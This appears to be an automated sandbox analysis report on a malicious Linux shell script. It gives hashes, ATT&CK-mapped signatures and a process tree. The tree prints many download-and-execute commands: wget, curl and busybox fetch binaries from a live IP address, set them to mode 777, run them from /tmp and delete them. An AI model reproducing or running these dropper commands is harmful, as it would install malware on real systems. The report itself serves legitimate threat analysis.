Analysis
-
max time kernel
31s -
max time network
129s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240508-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
14-11-2024 02:38
Static task
static1
Behavioral task
behavioral1
Sample
74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh
-
Size
10KB
-
MD5
b511b6f4aeffa16d10d0f7ef26b0e23b
-
SHA1
83f64c0a7d2007fd0182aaae9636c5bbba453efe
-
SHA256
74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc
-
SHA512
a1c7929b890f434323d545f2ff0617c27810df5928f3e0293cf4ac5bb7f3014d60af9634e6d734311204d66700d5b1b0c248f868d6a55b9e14c1c694c458e1c4
-
SSDEEP
96:mb9FNeCpCayHzBeLXN04ASV4A/vfyOaMw9FNeCzxCayHzy+desXXoBA04ASBnvKx:m9L14A/vfyOa+/vfyOy
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh/tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh1⤵PID:1526
-
/bin/rm/bin/rm bins.sh2⤵PID:1527
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵PID:1528
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵
- Writes file to tmp directory
PID:1532
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵PID:1533
-
-
/bin/chmodchmod 777 YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵
- File and Directory Permissions Modification
PID:1534
-
-
/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I./YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵
- Executes dropped EXE
PID:1535
-
-
/bin/rmrm YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵PID:1536
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵PID:1537
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵
- Writes file to tmp directory
PID:1538
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵PID:1539
-
-
/bin/chmodchmod 777 VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵
- File and Directory Permissions Modification
PID:1540
-
-
/tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS./VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵
- Executes dropped EXE
PID:1541
-
-
/bin/rmrm VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵PID:1542
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵PID:1543
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵
- Writes file to tmp directory
PID:1544
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵PID:1545
-
-
/bin/chmodchmod 777 fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵
- File and Directory Permissions Modification
PID:1546
-
-
/tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd./fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵
- Executes dropped EXE
PID:1547
-
-
/bin/rmrm fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵PID:1548
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵PID:1549
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵
- Writes file to tmp directory
PID:1550
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵PID:1551
-
-
/bin/chmodchmod 777 H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵
- File and Directory Permissions Modification
PID:1552
-
-
/tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS./H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵
- Executes dropped EXE
PID:1553
-
-
/bin/rmrm H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵PID:1554
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵PID:1555
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵
- Writes file to tmp directory
PID:1556
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵PID:1557
-
-
/bin/chmodchmod 777 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵
- File and Directory Permissions Modification
PID:1558
-
-
/tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi./4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵
- Executes dropped EXE
PID:1559
-
-
/bin/rmrm 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵PID:1560
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵PID:1561
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵
- Writes file to tmp directory
PID:1562
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵PID:1563
-
-
/bin/chmodchmod 777 RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵
- File and Directory Permissions Modification
PID:1564
-
-
/tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed./RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵
- Executes dropped EXE
PID:1565
-
-
/bin/rmrm RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵PID:1566
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵PID:1567
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵
- Writes file to tmp directory
PID:1568
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵PID:1569
-
-
/bin/chmodchmod 777 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵
- File and Directory Permissions Modification
PID:1570
-
-
/tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE./1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵
- Executes dropped EXE
PID:1571
-
-
/bin/rmrm 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵PID:1572
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵PID:1573
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵
- Writes file to tmp directory
PID:1574
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵PID:1575
-
-
/bin/chmodchmod 777 wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵
- File and Directory Permissions Modification
PID:1576
-
-
/tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ./wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵
- Executes dropped EXE
PID:1577
-
-
/bin/rmrm wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵PID:1578
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵PID:1579
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵
- Writes file to tmp directory
PID:1580
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵PID:1581
-
-
/bin/chmodchmod 777 H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵
- File and Directory Permissions Modification
PID:1582
-
-
/tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak./H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵
- Executes dropped EXE
PID:1583
-
-
/bin/rmrm H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵PID:1584
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵PID:1585
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵
- Writes file to tmp directory
PID:1586
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵PID:1587
-
-
/bin/chmodchmod 777 cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵
- File and Directory Permissions Modification
PID:1588
-
-
/tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ./cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵
- Executes dropped EXE
PID:1589
-
-
/bin/rmrm cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵PID:1590
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- System Network Configuration Discovery
PID:1591
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1592
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- System Network Configuration Discovery
PID:1593
-
-
/bin/chmodchmod 777 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- File and Directory Permissions Modification
PID:1594
-
-
/tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F./KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1595
-
-
/bin/rmrm KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- System Network Configuration Discovery
PID:1596
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵PID:1597
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵
- Writes file to tmp directory
PID:1598
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵PID:1599
-
-
/bin/chmodchmod 777 IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵
- File and Directory Permissions Modification
PID:1600
-
-
/tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L./IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵
- Executes dropped EXE
PID:1601
-
-
/bin/rmrm IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵PID:1602
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵PID:1603
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵
- Writes file to tmp directory
PID:1604
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵PID:1605
-
-
/bin/chmodchmod 777 FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵
- File and Directory Permissions Modification
PID:1606
-
-
/tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG./FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵
- Executes dropped EXE
PID:1607
-
-
/bin/rmrm FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵PID:1608
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵PID:1609
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵
- Writes file to tmp directory
PID:1610
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵PID:1611
-
-
/bin/chmodchmod 777 ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵
- File and Directory Permissions Modification
PID:1612
-
-
/tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt./ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵
- Executes dropped EXE
PID:1613
-
-
/bin/rmrm ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵PID:1614
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵PID:1615
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵
- Writes file to tmp directory
PID:1616
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵PID:1617
-
-
/bin/chmodchmod 777 VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵
- File and Directory Permissions Modification
PID:1618
-
-
/tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS./VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵
- Executes dropped EXE
PID:1619
-
-
/bin/rmrm VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵PID:1620
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵PID:1621
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵
- Writes file to tmp directory
PID:1622
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵PID:1623
-
-
/bin/chmodchmod 777 fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵
- File and Directory Permissions Modification
PID:1624
-
-
/tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd./fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵
- Executes dropped EXE
PID:1625
-
-
/bin/rmrm fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵PID:1626
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵PID:1627
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵
- Writes file to tmp directory
PID:1628
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵PID:1629
-
-
/bin/chmodchmod 777 H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵
- File and Directory Permissions Modification
PID:1630
-
-
/tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS./H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵
- Executes dropped EXE
PID:1631
-
-
/bin/rmrm H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵PID:1632
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵PID:1633
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵
- Writes file to tmp directory
PID:1634
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵PID:1635
-
-
/bin/chmodchmod 777 YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵
- File and Directory Permissions Modification
PID:1636
-
-
/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I./YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵
- Executes dropped EXE
PID:1637
-
-
/bin/rmrm YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵PID:1638
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵PID:1639
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵
- Writes file to tmp directory
PID:1640
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵PID:1641
-
-
/bin/chmodchmod 777 RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵
- File and Directory Permissions Modification
PID:1642
-
-
/tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed./RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵
- Executes dropped EXE
PID:1643
-
-
/bin/rmrm RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵PID:1644
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵PID:1645
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵
- Writes file to tmp directory
PID:1646
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵PID:1647
-
-
/bin/chmodchmod 777 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵
- File and Directory Permissions Modification
PID:1648
-
-
/tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE./1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵
- Executes dropped EXE
PID:1649
-
-
/bin/rmrm 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵PID:1650
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵PID:1651
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵
- Writes file to tmp directory
PID:1652
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵PID:1653
-
-
/bin/chmodchmod 777 wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵
- File and Directory Permissions Modification
PID:1654
-
-
/tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ./wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵
- Executes dropped EXE
PID:1655
-
-
/bin/rmrm wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵PID:1656
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵PID:1657
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵
- Writes file to tmp directory
PID:1658
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵PID:1659
-
-
/bin/chmodchmod 777 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵
- File and Directory Permissions Modification
PID:1660
-
-
/tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi./4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵
- Executes dropped EXE
PID:1661
-
-
/bin/rmrm 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵PID:1662
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵PID:1663
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵
- Writes file to tmp directory
PID:1664
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵PID:1665
-
-
/bin/chmodchmod 777 H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵
- File and Directory Permissions Modification
PID:1666
-
-
/tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak./H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵
- Executes dropped EXE
PID:1667
-
-
/bin/rmrm H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵PID:1668
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵PID:1669
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵
- Writes file to tmp directory
PID:1670
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵PID:1671
-
-
/bin/chmodchmod 777 cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵
- File and Directory Permissions Modification
PID:1672
-
-
/tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ./cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵
- Executes dropped EXE
PID:1673
-
-
/bin/rmrm cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵PID:1674
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- System Network Configuration Discovery
PID:1675
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1676
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- System Network Configuration Discovery
PID:1677
-
-
/bin/chmodchmod 777 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- File and Directory Permissions Modification
PID:1678
-
-
/tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F./KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1679
-
-
/bin/rmrm KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- System Network Configuration Discovery
PID:1680
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵PID:1681
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵
- Writes file to tmp directory
PID:1682
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵PID:1683
-
-
/bin/chmodchmod 777 IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵
- File and Directory Permissions Modification
PID:1684
-
-
/tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L./IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵
- Executes dropped EXE
PID:1685
-
-
/bin/rmrm IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵PID:1686
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵PID:1687
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵
- Writes file to tmp directory
PID:1688
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵PID:1691
-
-
/bin/chmodchmod 777 FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵
- File and Directory Permissions Modification
PID:1692
-
-
/tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG./FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵
- Executes dropped EXE
PID:1693
-
-
/bin/rmrm FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵PID:1694
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵PID:1695
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵
- Writes file to tmp directory
PID:1696
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵PID:1697
-
-
/bin/chmodchmod 777 ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵
- File and Directory Permissions Modification
PID:1698
-
-
/tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt./ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵
- Executes dropped EXE
PID:1699
-
-
/bin/rmrm ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵PID:1700
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97